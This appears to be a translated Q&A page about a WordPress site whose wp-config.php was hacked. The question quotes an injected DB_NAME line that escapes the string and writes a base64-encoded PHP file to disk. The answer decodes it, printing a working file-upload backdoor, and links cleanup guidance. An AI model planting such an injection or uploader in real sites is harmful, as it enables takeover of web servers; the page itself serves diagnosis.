php - wp-config.php 不断更改数据库名称、用户名和密码
问题描述
我正在使用 WordPress 和一个名为 WP-Rocket 的插件来优化我的网站。从两天前开始,wp-config.php 文件不断将数据库名称更改为如下代码。
**Original DB name was define('DB_NAME', 'db1');**
但改为
**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>
用户名和密码也更改为“用户”和“密码”,如下所示。
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'password');</i>
解决方案
我认为你有一个被黑的网站。如果您解码(https://www.base64decode.org/)您将获得的代码:
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
if($_FILES["filename"]["size"] > 1024*3*1024)
{
echo ("File too large (more than 3Mb)");
exit;
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
echo ("<br>Done!<br>");
} else {
echo("<br>Error! ".$php_errormsg."<br>");
}
}
?>
该代码只是关于上传文件大小的消息,但我认为它是更多被黑客入侵的 base64 文件部分的一部分。
所以,现在你有两个选择:1)雇人。
2) 或者您可以逐步浏览互联网上的指南:这是您可以在 wp.org 上查看的第一个指南。
https://codex.wordpress.org/FAQ_My_site_was_hacked#Some_steps_to_take
提示:如果一个网站被黑客入侵,你应该首先让它对访问者不可用,这样没有人会被感染。
推荐阅读
- javascript - 在js中调用'new'时引用'this'时出现问题
- java - Apache POI:连接字符串单元格中的德语单元格格式
- corda - 当 Corda 节点执行任何事务时,节点资源管理器会引发序列化异常
- javascript - 如何通过过滤和修改其他对象来动态创建对象而不改变层次结构?
- pandas - 使用 MultiIndex 列在不同级别求和或分组?
- android - 用 EditText 视图替换字符串以填空测验
- asp.net - 如何从sql server通过id过程调用retrivedata
- javascript - 在 chrome 工具中获得正确的全屏相机,但在真实设备中获得更小的屏幕
- reactjs - Reactjs 和 Firebase - 在 db 中向用户添加对象并为该对象生成唯一 URL
- haskell - cabal 文件和 repl 中的不同警告设置